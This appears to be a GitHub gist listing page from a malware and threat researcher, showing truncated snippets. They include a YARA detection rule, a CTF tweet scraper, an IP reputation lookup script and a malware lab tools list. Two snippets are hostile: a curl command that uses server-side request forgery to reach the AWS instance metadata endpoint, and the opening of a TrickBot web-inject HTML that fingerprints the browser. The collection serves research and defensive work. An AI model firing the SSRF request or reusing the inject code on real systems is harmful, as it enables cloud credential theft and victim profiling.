Skip to content

Instantly share code, notes, and snippets.

curl "http://tdir-webappalb-eza1ljisfr1s-421257952.us-east-1.elb.amazonaws.com/demo.php?site=http://169.254.169.254/latest/meta-data/"
SELECT job.job_id as [JOB_ID],
job.name as [JOB_NAME],
job.description as [JOB_DESCRIPTION],
steps.step_name,
steps.subsystem,
steps.command,
SUSER_SNAME(job.owner_sid) as [JOB_OWNER],
steps.proxy_id,
proxies.name as [proxy_account],
job.enabled,
rule Excel_Hidden_Macro_Sheet
{
meta:
Author = "InQuest Labs"
URL = "https://github.com/InQuest/yara-rules"
Description = "http://blog.inquest.net/blog/2019/01/29/Carving-Sneaky-XLM-Files/"
strings:
$ole_marker = {D0 CF 11 E0 A1 B1 1A E1}
$macro_sheet_h1 = {85 00 ?? ?? ?? ?? ?? ?? 01 01}
$macro_sheet_h2 = {85 00 ?? ?? ?? ?? ?? ?? 02 01}
@sneakymonk3y
sneakymonk3y / marker_.html
Created May 21, 2019 19:31
TRICKBOT injectdll64 HTML
<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">
function ahead()
{
objs = new Array([navigator, "navigator"], [screen, "screen"]);
str = new String("");
for(i = 0; i<objs.length; i++) {
for(var prop in objs[i][0]) {
@sneakymonk3y
sneakymonk3y / tweetgrab.py
Created March 18, 2019 19:02
HTB CTF - grab tweets based on Twitter handle specified and dump to .csv
#!/usr/bin/env python
# encoding: utf-8
import tweepy #https://github.com/tweepy/tweepy
import csv
#Twitter API credentials
consumer_key = ""
consumer_secret = ""
access_key = ""
@sneakymonk3y
sneakymonk3y / iplookup.sh
Last active November 13, 2023 12:23
IP lookup / greynoise.io / ipinfo.io / shodan.io / otx.alienvault.com
#!/bin/bash
args=("$@")
check_greynoise()
{
echo "GREYNOISE"
curl -s -XPOST -d 'ip='${args[0]} 'http://api.greynoise.io:8888/v1/query/ip' | jq '.'
}
@sneakymonk3y
sneakymonk3y / malware-lab-tools.txt
Last active March 19, 2020 07:42
Malware Lab Tools
BinText / strings / strings2 / bstrings
Process Monitor
Process Hacker
Autoruns
PEiD
Regshot
LordPE
Ollydbg
IDA Pro/FREE
WireShark
@sneakymonk3y
sneakymonk3y / README.md
Created August 20, 2017 16:20 — forked from hofmannsven/README.md
My simply MySQL Command Line Cheatsheet

Keybase proof

I hereby claim:

  • I am sneakymonk3y on github.
  • I am markrobinsonuk (https://keybase.io/markrobinsonuk) on keybase.
  • I have a public key whose fingerprint is ECA3 444F 6B24 2086 DF9B 3031 2599 7F90 2D61 F421

To claim this, I am signing this object: